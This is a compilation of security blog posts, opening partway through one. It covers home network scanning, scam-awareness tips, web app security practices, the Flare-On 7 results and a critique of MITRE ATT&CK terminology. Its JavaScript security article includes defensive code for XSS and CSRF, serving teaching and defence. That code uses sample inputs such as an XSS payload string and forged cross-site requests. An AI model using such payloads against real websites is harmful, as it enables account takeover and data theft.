Download the HNS App on your Android or iOS device to give it a spin. Note that the HNS App, when used by itself, performs the same functions as the HCHN app on those devices.

If you like what you see, pair the HNS App to a Home Network Security Station to get the full range of protections. (Note too that once you do, the HCHN App will be disabled on all your devices and network and replaced by Home Network Security.)

Figure 5. Home Network Security (HNS) App

Figure 6. HNS App Paired with the Home Network Security Station

Final Words

Home networks come with security risks. As the tech-savvy member of your household, you need to be aware of those risks. Using Trend Micro HouseCall for Home Networks (HCHN), you’ll be able to know which devices are connected to your home Wi-Fi network and whether these devices bear security risks that can be exploited by hackers and malicious software. Moreover, you’ll be provided with suggestions, in case your devices are found vulnerable.

However, just knowing the security risks is only half the battle in protecting your home network. You’ll need a more robust system that can automatically block suspicious and malicious traffic and do more, such as protecting your child’s online safety. Trend Micro Home Network Security (HNS) can address your home network’s security, even as it monitors your home network, prevents intrusions, blocks hacking attempts and web threats, and protects your family’s privacy, while keeping the internet safe for your kids.

Download Trend Micro Housecall for Home Networks from the Web, Google Play Store or Apple App Store to give it a try.

Go to Trend Micro Home Network Security to get more details on the solution, or to buy.

The post Trend Micro HouseCall for Home Networks: Giving You a Free Hand in Home Network Security appeared first on .

Spotlighting McAfee’s Women in Technology Scholarship Recipients

Working at McAfee is so much more than fighting off cyber-attacks; it’s also about learning valuable life lessons and fostering meaningful relationships. Recipients of our Women in Technology (WIT) Scholarship learned firsthand the immeasurable growth and invaluable experience gained at McAfee through their participation in the summer internship program in Cork, Ireland.

As we accept applications for prospective scholars from now until November 20, we are reminded of the positive impact this program has had on previous participants. The program offers 3000 Euro per annum to the chosen student for each year of the course, a summer internship at McAfee Cork, and a mentor who offers guidance to the scholar on managing their academic career.

From building professional relationships to developing the skills needed for a successful career in STEM-related fields through mentorships and training, four Women in Technology (WIT) Scholarship winners share their unique experiences in the program:

Alison, Mathematical Sciences

The WIT Scholarship has been incredible for me in so many ways—from the practical experience of working at McAfee to the inspiration and support that I have received from my mentors and other brilliant people during my time here. I was able to put the monetary support I received towards studying at UC San Diego in 2019. The scholarship has opened so many doors for me.

The skills I have learned at McAfee have helped me with my University projects. I had the chance to improve my coding abilities, learn new languages, and use statistical tools. In an educational environment, you sometimes miss the “Why are we doing this?” aspect of learning a new skill. Through my projects at McAfee, I understood the practical implementation of coding and statistics, which gave me a greater appreciation for what I was learning in school and motivated me to further improve my skills.

Clodagh, Financial Maths and Actuarial Science

During my internship, I had the chance to work with the Database Security team. I really felt like a member of the team and was made to feel valued. Everyone in McAfee was extremely friendly and approachable.

In addition to receiving the scholarship, I was lucky enough to receive two mentors. My initial mentor Ciara was incredibly thoughtful, motivational, and truly inspiring. She encouraged me to take part in extracurricular activities, so I became a committee member of the Math society in UCC. She provided me with numerous inspirational books and was always readily available to answer any questions. At the end of my second-year scholarship, I received a new mentor: Jill. She was incredibly helpful, kind, and a valuable resource in my career progression.

My plan for the future is to learn more coding languages and hopefully complete another internship with McAfee! It is truly an amazing experience.

Jade, Mathematical Sciences

I had the opportunity to work alongside the Applied Data Science team. They gave me lots of advice and enlightened me on their own career journeys. Their experiences gave me confidence and reassurance in my course choice and I realized that there are so many career opportunities in programming. I’ve learned so many new skills, some of which were not covered in school, and I feel like I have a true advantage in the industry.

I have learned so much about working in a multinational company. I participated in the daily stand-ups with the team. I learned about sprint demos as well as the Agile and Waterfall methods. I attended all-hands meetings, which was a brand-new experience for me. I learned how to research effectively and swiftly pass that information on to my team. I also participated in an internal dataset competition, first learning about Machine Learning and then building my own. I managed to host my own meeting for others who wanted to get involved, which was nerve-wracking but I’m glad I did it.

Aine, Data Science & Analytics

I’m incredibly grateful for the vast support and opportunities that I have received through my learning path in STEM to date, particularly my involvement in the McAfee WIT Scholarship Program. My experience with McAfee has further enriched my educational experience and cultivated my passion for science and technology. As a result of receiving this scholarship, I’ve developed a particular interest in the application of data science in cyber-security. Cyber crime and cyber threats have an ever-increasing potential to cause serious harm to our society, so I’m fascinated by the application of data science, machine learning and artificial intelligence in saving lives.

Want to become a 2020 WIT Scholar? Apply now!

Know any future scientists? The closing date to apply for the WIT Scholarship is Friday, November 20, 2020. For more details on applying, click here.


The post Spotlighting McAfee’s Women in Technology Scholarship Recipients appeared first on McAfee Blogs.

Cruel Ghouls: New Digital Scams Target Every Age Group


There are few situations more personal than a distressed family member calling to ask for financial help. But personal is precisely the angle bad actors are taking these days in scams that target both the young and old.

Grandparents Fall for ‘Help!’ Scams

Called “The Grandparent Scam,” this con usually begins with a simple, “Hi, Grandma!” from a criminal posing as the victim’s grandchild who claims to be in trouble. Then comes the ask — that the loving (and worried) Grandparent wire money for bail, airfare, a collision, or some other emergency. Some scammers have even managed to spoof the incoming caller ID to read “U.S. District Court.”

Safe Family Tips: 1) Ask the caller to prove who they are and call the child’s parent or another relative to verify the situation. 2) Never wire money, gift cards, or send cash by courier. 3) Be skeptical of “urgent” requests and tearful pleas for cash or personal information.

Tricksters Target Millennials

While it’s hard to imagine being duped by this kind of phone call, you might be surprised to learn that it’s younger people falling hardest for scams. The Federal Trade Commission reports that Millennials (20-30-year-olds) are most likely to lose money to online fraud. The top 5 scams targeting Millennials include online shopping, business imposters, government imposters, fake check scams, and romance scams.

Safe Family Tips: Be skeptical when shopping online. Cybercriminals have created countless look-alike merchant sites to gain access to your credit card and other personal information. Confirm the seller’s physical address and phone number before you make a purchase. Consider putting security software on your family’s devices that protects against malware and viruses and provides families with Virtual Private Network (VPN) encryption for safe shopping.

Hackers Exploit Schools, Students

With many school districts operating on a hybrid virtual and in-class education model, the digital gap between teachers and remote students has given bad actors a new channel to launch ransomware, phishing, and social engineering scams against exposed IT infrastructures. According to the FBI, “cyber actors are likely to increase targeting of K-12 schools during the COVID-19 pandemic.”

Also, a recent Microsoft Security Intelligence study found that 61 percent of the 7.7 million malware encounters over the previous month targeted education, a number far higher than other sectors. Scams include malware attacks on e-learning platforms and ransomware attacks on larger districts.

Safe Family Tips: Inquire about on-site security measures in place at your child’s school. Look into software to protect your home network and personal devices against cyberattacks launched through email, school networks, or social media sites.

How’s Your Cyber Hygiene?

Your best defense against a scam — should it come via phone, email, or a website — is a solid offense. Consider boosting your cyber hygiene routine by using strong passwords, a VPN, and staying informed about the latest scams. By now, we know the bad actors online don’t discriminate based on age; they are out to steal data and dollars from anyone who lets down their guard.

The post Cruel Ghouls: New Digital Scams Target Every Age Group appeared first on McAfee Blogs.

Best Security Practices to Protect your Web Application from Future Threats

Almost all businesses nowadays use web applications to drive their growth, but the security of these apps is easily compromised if proper steps are not taken. During web application development, all other features are given time and preference, but very few teams give web application security the attention it deserves. The vulnerabilities in your web application can be easily exploited by cybercriminals, who are always searching for sites with weaker security protection.

Here are some of the most important security practices that you should implement to secure your web application from the most common threats:

Install SSL Certificates

One of the most effective measures to secure your web applications from cyberattacks is encrypting all the information shared on them. SSL certificates use the SSL (Secure Sockets Layer) or TLS (Transport Layer Security) security protocols to protect data from cybercriminals through encryption.

If you do not activate SSL certificates on your web applications, hackers can easily read the shared information if they somehow get access to it. SSL certificates use cryptographic keys to make it impossible for attackers to read the data.

The certificate authorities ensure that data transfer is encrypted throughout the communication process. Before buying an SSL certificate for your web app, make sure you are purchasing it from a trustworthy SSL authority such as ClickSSL, which provides some of the most popular SSL certificates at a very reasonable price.

Manage User Permissions

Managing users’ permissions wisely makes your web applications more secure. Your company likely has numerous employees, and not every worker needs full access to the system to perform his or her job. So, it is best to implement the “Principle of least privilege” to limit every user’s access.

If you have granted full access permissions to everyone working in your organization, it will take a single cyber-attack by the scammers to access your entire system. So, to avoid any data breaches, you should strictly implement the least privilege principle in your firm. This may be a time-consuming process, but it will save your web app from many potential threats and malicious workers too.

Train your Employees

If you are running an organization, you should never expect that most of your employees will have a decent knowledge of current cyber security threats. Most of your staff members will not have the necessary information about these scams. This may put you and your company in hot water, as employees with no sound knowledge of cyberattacks can quickly become the victims of hackers.

So, to protect your web application, you need to conduct proper cybersecurity training sessions for your employees. You must hire a web application security expert to train all your staff about the potential threats to your web app and operating environment.

This cyber security training will help your employees independently identify and save themselves and your business from all security threats.

Hire Professional Hackers

Ethical hackers use the same tricks and techniques applied by cybercriminals to exploit your web application’s vulnerabilities, but they do so for your benefit, to help you understand the security risks in your web app. Professional white hat hackers use the following techniques to test your web app’s security:

• Cross-site scripting (XSS)
• Man-in-the-middle (MITM) attacks
• Broken authentication
• Distributed Denial-of-service (DDoS) attacks
• Sensitive data exposure
• SQL injection
• Phishing
• White hat hacking

After a penetration test (pen test) of your web app, you will be familiar with your website’s security weaknesses, which will help you improve your web application’s security.

Secure Web App during Development

This is one of the essential security steps in protecting your web apps from the reach of hackers. This technique is all about preventing your software from security issues that occur during the development lifecycle. For this, you need to hire developers who have full knowledge of all the prevalent security problems and prevent malicious code in the actual program of the web application.

And if they find any malicious activity during the development lifecycle, they should identify and eliminate that issue.

Regular Updates

With multiple network security threats, it is essential to release regular updates for your web app’s security. Outdated software lacks recent security features and can easily be manipulated by malicious hackers. Depending on your web app’s infrastructure, you need to update your web app’s components. Keeping your web application up to date will protect it from known attacks by hackers.

Keep Monitoring your App Regularly

To stay on the safe side, you should regularly look for security vulnerabilities in your web app, using different techniques to test your app’s security level. You can use dynamic and static application security testing tools to monitor your web app’s performance and security level. Regular testing of your system will help you know the vulnerabilities and implement new protection schemes to protect your web application.

Backup all Data

With an increase in the number of cyberattacks in today’s world, your web app data remains under threat every time. Hackers may get full access to your web app data that will put you in serious trouble. To avoid such a situation, you need to store all your web app data at another location. It may be a good idea to replicate the archives of all your information in multiple places to protect you from heavy losses in case your primary backup location is damaged or compromised.

The 3-2-1 backup rule diagram

Employ Security Experts

You need to invest more in security services to protect your web application from cybercriminals. Hiring security experts is a wise step towards improving your web app security. A security specialist or security service company uses specialized tools to monitor the security level of your website. The scanning results show the vulnerabilities present in your site. They then help you implement new security techniques to protect your web applications.

Before hiring anyone for security improvements, do complete research and check the reputation of the individual or the firm to validate their competence and authenticity.

Conclusion

Cybercriminals are finding new ways to take advantage of the weaknesses in your web applications. They always remain searching for websites that have poor web application security to launch an attack on them. To protect your web applications, you need to stay updated about all the known security threats. For organizations, dealing with malicious attacks is dependent on all employees. If any of your workers make a mistake in handling the potential cyberattack, it can put all your firm’s data in danger.

Cybersecurity protection starts with training your employees and implementing the right security techniques to secure your web applications. Implementing the above-listed best security practices will keep your web applications safe from all types of cyberattacks.

The post Best Security Practices to Protect your Web Application from Future Threats appeared first on CyberDB.

Everything You Need to Know About JavaScript Security

These days, JavaScript is one of the more well-known and established programming languages around. JavaScript is mostly found in the code of dynamic web pages that allow for extended JavaScript functionalities. These functionalities include useful operations such as interactivity, tracking user activities, and form submission or validation. Although JavaScript is generally regarded as a reasonably safe coding language, many users are growing skeptical about certain aspects of JavaScript security.

Many well-known JavaScript vulnerabilities can affect both the server side and the client side. Malicious hackers can exploit these vulnerabilities through a number of open paths in your application. When using JavaScript in your application, it is critical to take all JavaScript security threats seriously and to use an open source vulnerability scanner to find them.

This article will detail two of the most severe potential JavaScript security vulnerabilities and how to deal with them appropriately. 

Cross-Site Scripting (XSS) Attacks: What Are They?

One of the most common browser-side vulnerabilities is called “Cross-Site Scripting.” Also known as XSS, Cross-Site Scripting attacks target client-side code such as JavaScript or HTML and exploit a security weak spot in a web application. In an XSS attack, hackers use a legitimate web application to perform malicious tasks by exploiting that vulnerability.

XSS attacks are, unfortunately, all too common and can result in the theft of one’s data or identity. By gaining control of the user’s browser, these attacks can also spread a virus across the network.

Hackers and malicious actors exploit weaknesses in a website. The attack is performed by injecting JavaScript code into the parameters of the site, then using this exploit to gain access to the user’s data. Essentially, this code lets the hacker take over the victim’s session ID in order to take control of the browser.

How can it be prevented? 

There are several ways to ensure that your JavaScript is safe and secure:

  • First, you must filter all input as it arrives. This means that whenever a user provides input, there needs to be a strict filter to compare it to what is generally assumed to be valid input.
  • Use appropriate and effective response headers. To prevent XSS in HTTP responses that are not supposed to contain any HTML, set the Content-Type and X-Content-Type-Options headers. These headers make sure that the browser interprets the response in the way that was intended and cannot be tricked into treating it as active content.
  • You should also encode your data when it is being outputted. When a user’s data is outputted in an HTTP response, the output should be encoded to prevent it from being identified as active content.
  • Lastly, be sure to use a Content Security Policy. If you have a CSP set up to the right set of rules, you will be able to prevent the browser from executing any unwanted operations or any JavaScript code that may come from an untrusted source.
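The four defenses in this list, combined in one response path. This is an added example, not code from the original article; the function names, the display-name allowlist and the CSP rules are assumptions chosen for illustration, and the sample input is constructed.

```javascript
// 1. Filter input on arrival: compare it to a strict definition of valid input.
// Assumed rule: letters, digits, space, dot, underscore, hyphen; 1 to 32 chars.
function validateDisplayName(input) {
  return typeof input === 'string' && /^[A-Za-z0-9 ._-]{1,32}$/.test(input);
}

// 3. Encode on output so user data is never parsed as markup or script.
// This table covers HTML element content and quoted attribute values only.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// 2 and 4. Response headers: an explicit Content-Type, nosniff so the browser
// does not guess a different type, and a CSP that only allows same-origin
// scripts (inline <script> blocks and inline event handlers are refused).
function securityHeaders(contentType) {
  return {
    'Content-Type': contentType,
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
  };
}

// HTML page: validate the name, encode both values before they reach markup.
function buildCommentResponse(displayName, comment) {
  if (!validateDisplayName(displayName)) {
    return {
      status: 400,
      headers: securityHeaders('text/plain; charset=utf-8'),
      body: 'Invalid display name',
    };
  }
  const body =
    `<article><h2>${escapeHtml(displayName)}</h2>` +
    `<p>${escapeHtml(comment)}</p></article>`;
  return {
    status: 200,
    headers: securityHeaders('text/html; charset=utf-8'),
    body,
  };
}

// API response that is not supposed to contain HTML: the data is left as-is,
// and the headers tell the browser never to render it as a page.
function buildJsonResponse(data) {
  return {
    status: 200,
    headers: securityHeaders('application/json; charset=utf-8'),
    body: JSON.stringify(data),
  };
}

// Constructed sample input: markup that would run script if echoed unencoded.
const SAMPLE_COMMENT = '<img src=x onerror="alert(1)"> nice post';

console.log(buildCommentResponse('alice_01', SAMPLE_COMMENT).body);
```

The encoder is only correct for HTML body and quoted-attribute contexts; data placed inside a script block, a URL or a style needs the encoding for that context instead.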

Cross-Site Request Forgery (CSRF) Attacks: What Are They?

An XSRF or CSRF is a well-known attack in which the hacker attempts to impersonate or completely take over the identity of the victim by hijacking their active session cookie. This attack is possible when the target site attempts to authenticate a request by only using cookies, which will allow the hacker to gain access or hijack the functional cookies, to appear to be a legitimate user. 

This attack can be very harmful to the victim and can lead to fraud, account tampering, or data theft. The most common targets are popular web applications such as social media, web interfaces, online banking, and in-browser email clients. 

Let us use the online banking situation as an example. 

Most banking websites use active session cookies to authenticate user requests. A typical order of events is to log into the banking account, enter the valid details needed, then click on the transfer button.

When a user logs into the account, the banking website will store a session cookie that it will refer back to in order to authorize the transactions. 

The Hack

In order to initiate the hack itself, the hacker would need to create a website that looks legitimate but has an underlying agenda. For this example, we will use a blogging website. If the user logs in and wants to create a new blog post, the malicious application running in the background will then send a “GET” request out to the banking website. This hack is only useful when the user is also logged into the banking site. If they are, the session tokens will be active and in place.

The hacker will then manipulate the “GET” request in order to operate the banking site stealthily. Once the user clicks on the button to add a blog post, they will also unwittingly transfer money to the hacker’s account.

How can it be prevented?

  • Always set the SameSite attribute on session cookies.
  • The site must also verify the Referer header or the Origin header.
  • Implement user-interaction-based protection, especially for highly sensitive procedures like banking. This should include a re-authentication (usually a password), a CAPTCHA, or even a one-time token. These steps can be strong defenses against a CSRF attack if they are used correctly.
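A server-side gate for the banking transfer described above, applying the three measures in this list. This is an added example, not code from the original article; `bank.example` and `blog.example` are placeholder hosts, all function names are hypothetical, and the `reauthenticated` flag is assumed to be set by the application after a fresh password check. The sample requests are constructed.

```javascript
// Origins allowed to submit state-changing requests (assumed value).
const TRUSTED_ORIGINS = new Set(['https://bank.example']);
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// SameSite=Strict tells the browser not to attach the session cookie to
// requests that another site initiates, such as the blog's hidden request.
function sessionCookie(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Strict`;
}

// Origin of the page that sent the request: the Origin header if present,
// otherwise the origin parsed out of Referer. Header names are lowercase,
// as Node's http module delivers them.
function requestOrigin(headers) {
  if (headers.origin) return headers.origin; // the literal "null" is rejected later
  if (!headers.referer) return null;
  try {
    // Parse instead of substring-matching, so lookalike hosts do not pass.
    return new URL(headers.referer).origin;
  } catch {
    return null;
  }
}

function checkTransferRequest(req) {
  // A transfer must never be reachable through a "safe" method like GET.
  if (SAFE_METHODS.has(req.method.toUpperCase())) {
    return { allowed: false, reason: 'state change requires POST' };
  }
  const origin = requestOrigin(req.headers);
  if (origin === null) {
    return { allowed: false, reason: 'missing Origin and Referer' };
  }
  if (!TRUSTED_ORIGINS.has(origin)) {
    return { allowed: false, reason: `untrusted origin ${origin}` };
  }
  // User-interaction-based protection: a fresh re-authentication is required.
  if (!req.reauthenticated) {
    return { allowed: false, reason: 're-authentication required' };
  }
  return { allowed: true, reason: 'ok' };
}

// Constructed sample requests covering the scenario and its edge cases.
const SAMPLE_REQUESTS = [
  { name: 'forged GET from blog', method: 'GET',
    headers: { referer: 'https://blog.example/new-post' }, reauthenticated: false },
  { name: 'cross-site POST', method: 'POST',
    headers: { origin: 'https://blog.example' }, reauthenticated: true },
  { name: 'lookalike Referer', method: 'POST',
    headers: { referer: 'https://bank.example.blog.example/transfer' }, reauthenticated: true },
  { name: 'no Origin or Referer', method: 'POST',
    headers: {}, reauthenticated: true },
  { name: 'same origin, no re-authentication', method: 'POST',
    headers: { origin: 'https://bank.example' }, reauthenticated: false },
  { name: 'legitimate transfer', method: 'POST',
    headers: { referer: 'https://bank.example/transfer' }, reauthenticated: true },
];

function evaluateSamples() {
  return SAMPLE_REQUESTS.map((req) => ({ name: req.name, ...checkTransferRequest(req) }));
}

for (const r of evaluateSamples()) {
  console.log(`${r.allowed ? 'ALLOW' : 'DENY '} ${r.name}: ${r.reason}`);
}
```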

JavaScript security is a topic that is not often talked about; however, it is highly essential to many professions. Learning to execute JavaScript safely and correctly is not something that most people are able to learn overnight. 

When you are looking to test or upgrade your JavaScript security, it is highly recommended to seek the help of a certified professional or cyber security specialist. These professionals will give you a better and more detailed understanding of your security risks and what actions you can take to correct them. Taking the security of your website seriously is no easy task and requires constant maintenance. However, if you take precautions, your users will be able to browse knowing they are using a safe and secure site. 

The post Everything You Need to Know About JavaScript Security appeared first on CyberDB.

Trick or Treat: Avoid These Spooky Threats This Halloween

Spooky season is among us, and ghosts and goblins aren’t the only things hiding in the shadows. Online threats are also lurking in the darkness, preparing to haunt devices and cause some hocus pocus for unsuspecting users. This Halloween season, researchers have found virtual zombies and witches among us – a new trojan that rises from the dead no matter how many times it’s deleted and malicious code that casts an evil spell to steal users’ credit card data.

Let’s unlock the mystery of these threats so you can avoid cyber-scares and continue to live your online life free from worry.

Zombie Malware Hides in the Shadows

Just like zombies, malware can be a challenge to destroy. Oftentimes, it requires a user to completely wipe their device by backing up files, reinstalling the operating system, and starting from scratch. But what if this isn’t enough to stop the digital walking dead from wreaking havoc on your device?

Recently, a new type of Trojan has risen from the dead to haunt users no matter how many times it’s deleted. This zombie-like malware attaches itself to a user’s Windows 10 startup system, making it immune to system wipes since the malware can’t be found on the device’s hard drive. This stealthy malware hides on the device’s motherboard and creates a Trojan file that reinstalls the malware if the user tries to remove it. Once it sets itself up in the darkness, the malware scans for users’ private documents and sends them to an unknown host, leaving the user’s device in a ghoulish state.

Cybercriminals Leave Credit Card Users Spellbound

A malware misfortune isn’t the only thing that users should beware of this Halloween. Cybercriminals have also managed to inject malicious code into a wireless provider’s web platform, casting an evil spell to steal users’ credit card data. The witches and warlocks allegedly responsible for casting this evil spell are part of a Magecart spin-off group that’s known for its phishing prowess. To pull off this attack, they planted a credit card skimmer onto the wireless provider’s checkout page. This allowed the hackers to exfiltrate users’ credit card data whenever they made a purchase – a spell that’s difficult to break.

Why These Cyberspooks Are Emerging

While these threats might seem like just another Halloween trick, there are other forces at play. According to McAfee’s Quarterly Threats Report from July 2020, threats like malware phishing and trojans have proven opportunistic for cybercriminals as users spend more and more time online – whether it be working from home, distance learning, or connecting with friends and loved ones. In fact, McAfee Labs observed 375 threats per minute in Q1 2020 alone.

So, as hackers continue to adapt their techniques to take advantage of users spending more time online, it’s important that people educate themselves on emerging threats so they can take necessary precautions and live their digital lives free from worry.

How to Stay Protected

Fortunately, there are a number of steps you can take to prevent these threats from haunting your digital life. Follow these tips to keep cybersecurity tricks at bay this spooky season:

Beware of emails from unknown senders

Zombie malware is easily spread by phishing, which is when scammers try to trick you out of your private information or money. If you receive an email from an unknown user, it’s best to proceed with caution. Don’t click on any links or open any attachments in the email and delete the message altogether.

Review your accounts

Look over your credit card accounts and bank statements often to check whether someone is fraudulently using your financial data – you can even sign up for transaction alerts that your bank or credit card company may provide. If you see any charges that you did not make, report it to the authorities immediately.

Use a comprehensive security solution

Add an extra layer of protection with a security solution like McAfee® Total Protection to help safeguard your digital life from malware and other threats. McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files.

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Trick or Treat: Avoid These Spooky Threats This Halloween appeared first on McAfee Blogs.

Flare-On 7 Challenge Solutions

We are thrilled to announce the conclusion of the seventh annual Flare-On challenge. This year proved to be the most difficult challenge we’ve produced, with the lowest rate of finishers. This year’s winners are truly the elite of the elite! Lucky for them, all 260 winners will receive this cyberpunk metal key.

We would like to thank the challenge authors individually for their great puzzles and solutions:

  1. fidler – Nick Harbour (@nickharbour)
  2. garbage – Jon Erickson
  3. Wednesday – Blaine Stancill (@MalwareMechanic)
  4. report – Moritz Raabe (@m_r_tz)
  5. TKApp – Moritz Raabe (@m_r_tz)
  6. CodeIt – Mike Hunhoff (@mehunhoff)
  7. re_crowd – Chris Gardner, Moritz Raabe, Blaine Stancill
  8. Aardvark – Jacob Thompson
  9. crackinstaller – Paul Tarter (@Hefrpidge)
  10. break – Chris Gardner
  11. Rabbit Hole – Sandor Nemes (@sandornemes)

This year’s Flare-On challenge was the first to feature a live public scoreboard, so players could track their progress and the progress of previous Flare-On challenge champions. Despite this increased data at your fingertips, we are still going to bring you even more stats. As of 11:00am ET, participation was near record setting levels at 5,648 players registered. 3,574 of those players finished at least one challenge.

The U.S. reclaimed the top spot for total finishers with 22. Singapore was once again in second place, but in uncontested first place per capita, with one Flare-On finisher for every 296,000 living persons in Singapore. This is the first year we have included a per capita finishers by country chart, and we did it to highlight just what a remarkable concentration of talent exists in some corners of the world. Consistent top finisher Russia took third place, and a growing player base in Germany and Israel came into full bloom this year, with those countries edging out other frequent top five countries such as China, India and Vietnam.

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11

MITRE ATT&CK Tactics Are Not Tactics



Just what are "tactics"?

Introduction


MITRE ATT&CK is a great resource, but something about it has bothered me since I first heard about it several years ago. It's a minor point, but I wanted to document it in case it confuses anyone else.

The MITRE ATT&CK Design and Philosophy document from March 2020 says the following:

At a high-level, ATT&CK is a behavioral model that consists of the following core components:

• Tactics, denoting short-term, tactical adversary goals during an attack;
• Techniques, describing the means by which adversaries achieve tactical goals;
• Sub-techniques, describing more specific means by which adversaries achieve tactical goals at a lower level than techniques; and
• Documented adversary usage of techniques, their procedures, and other metadata.

My concern is with MITRE's definition of "tactics" as "short-term, tactical adversary goals during an attack," which is oddly recursive.

The key word in the tactics definition is goals. According to MITRE, "tactics" are "goals."

Examples of ATT&CK Tactics


ATT&CK lists the following as "Enterprise Tactics":

MITRE ATT&CK "Tactics," https://attack.mitre.org/tactics/enterprise/

Looking at this list, the first 11 items could indeed be seen as goals. The last item, Impact, is not a goal. That item is an artifact of trying to shoehorn more information into the ATT&CK structure. That's not my primary concern though.

Military Theory and Definitions


As a service academy graduate who had to sit through many lectures on military theory, and who participated in small unit exercises, the idea of tactics as "goals" does not make any sense.

I'd like to share three resources that offer a different perspective on tactics. Although all three are military, my argument does not depend on that association.

The DOD Dictionary of Military and Associated Terms defines tactics as "the employment and ordered arrangement of forces in relation to each other. See also procedures; techniques. (CJCSM 5120.01)" (emphasis added)

In his book On Tactics, B. A. Friedman defines tactics as "the use of military forces to achieve victory over opposing enemy forces over the short term." (emphasis added)

Dr. Martin van Creveld, scholar and author from the military strategy world, wrote the excellent Encyclopedia Britannica entry on tactics. His article includes the following:

"Tactics, in warfare, the art and science of fighting battles on land, on sea, and in the air. It is concerned with the approach to combat; the disposition of troops and other personalities; the use made of various arms, ships, or aircraft; and the execution of movements for attack or defense...

The word tactics originates in the Greek taxis, meaning order, arrangement, or disposition -- including the kind of disposition in which armed formations used to enter and fight battles. From this, the Greek historian Xenophon derived the term tactica, the art of drawing up soldiers in array. Likewise, the Tactica, an early 10th-century handbook said to have been written under the supervision of the Byzantine emperor Leo VI the Wise, dealt with formations as well as weapons and the ways of fighting with them.

The term tactics fell into disuse during the European Middle Ages. It reappeared only toward the end of the 17th century, when “Tacticks” was used by the English encyclopaedist John Harris to mean 'the Art of Disposing any Number of Men into a proposed form of Battle...'"

From these three examples, it is clear that tactics are about use and disposition of forces or capabilities during engagements. Goals are entirely different. Tactics are the methods by which leaders achieve goals. 

How Did This Happen?


I was not a fly on the wall when the MITRE team designed ATT&CK. Perhaps the MITRE team fixated on the phrase "tactics, techniques, and procedures," or "TTPs," again derived from military examples, when they were designing ATT&CK? TTPs became hot during the 2000s as incident responders with military experience drew on that language when developing concepts like indicators of compromise. That fixation might have led MITRE to use "tactics" for their top-level structure.

It would have made more sense for MITRE to have just said "goal" or "objective," but "GTP" isn't recognized by the digital defender world.

It's Not Just the Military


Some readers might think "ATT&CK isn't a military tool, so your military examples don't apply." I use the military references to show that the word tactic does have military origins, like the word "strategy," from the Greek Strategos or strategus, plural strategoi, (Greek: στρατηγός, pl. στρατηγοί; Doric Greek: στραταγός, stratagos; meaning "army leader"). 

That said, I would be surprised to see the word tactics used as "goals" anywhere else. For example, none of these examples from the non-military world involve tactics as goals:

This Harvard Business Review article defines tactics as "the day-to-day and month-to-month decisions required to manage a business." 

This guide for ice hockey coaches mentions tactics like "give and go’s, crossing attacks, cycling the puck, chipping the puck to space and overlapping."

The guide for small business marketing lists tactics like advertising, grass-roots efforts, trade shows, website optimization, and email and social marketing.

In the civilian world, tactics are how leaders achieve goals or objectives.

Conclusion


In the big picture, it doesn't matter that much to ATT&CK content that MITRE uses the term "tactics" when it really means "goals." 

However, I wrote this article because the ATT&CK design and philosophy emphasizes a common language, e.g., ATT&CK "succinctly organizes adversary tactics and techniques along with providing a common language used across security disciplines."

If we want to share a common language, it's important that we recognize that the ATT&CK use of the term "tactics" is an anomaly. Perhaps a future edition will change the terminology, but I doubt it given how entrenched it is at this point.

Update: This Tweet from Matt Brady made this point:

"Agreed - for example, supply chain compromise is a tactic used for initial access, whereas software supply chain compromise (ShadowHammer) is a specific technique."

This Week in Security News: Watering Hole Campaign Operation Earth Kitsune Spying on Users’ Systems and Fancy Bear Imposters Are on a Hacking Extortion Spree

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a watering hole campaign Trend Micro dubbed ‘Operation Earth Kitsune’ that is spying on users’ systems through compromised websites. Also, read about how APT groups are threatening DDoS attacks against victims if they don’t send them bitcoin.

Read on:

Fancy Bear Imposters Are on a Hacking Extortion Spree

Radware recently published extortion notes that were sent to a variety of companies globally. The senders purport to be from the North Korean government hackers Lazarus Group, or APT38, and Russian state-backed hackers Fancy Bear, or APT28. The notes threaten that if the target doesn’t send bitcoin, powerful distributed denial of service (DDoS) attacks will be launched against the victim. Robert McArdle, Trend Micro’s director of our Forward-Looking Threat Research (FTR) team, comments on DDoS as an extortion method.

A Ride on Taiwan’s Self-Driving Bus

The self-driving bus is now being tested on the streets of downtown Taipei and more autonomous buses are being deployed in other places, including Germany, Japan and Canada. Since connected cars are still a relatively new technology, the dangers of these vehicles are unknown and mostly speculated. In this article, Trend Micro discusses potential security implications of these connected vehicles.

U.S. Charges Russian Intelligence Officers in Major Cyberattacks

This week, the Justice Department unsealed charges accusing six Russian military intelligence officers of an aggressive worldwide hacking campaign that caused mass disruption and cost billions of dollars by attacking targets like a French presidential election, the electricity grid in Ukraine and the opening ceremony of the 2018 Winter Olympics.

Operation Earth Kitsune: Tracking SLUB’s Current Operations

A watering hole campaign that Trend Micro has dubbed as Operation Earth Kitsune is spying on users’ systems through compromised websites. Using SLUB and two new malware variants, the attacks exploit vulnerabilities including those of Google Chrome and Internet Explorer.

Cybersecurity Company Finds Hacker Selling Info on 186 Million U.S. Voters

Trustwave says it found a hacker selling personally identifying information of more than 200 million Americans, including the voter registration data of 186 million. The revelation underscored how vulnerable Americans are to email targeting by criminals and foreign adversaries, even as U.S. officials announced that Iran and Russia had obtained voter registration data and email addresses with an eye toward interfering in the 2020 election.

Future Imperfect

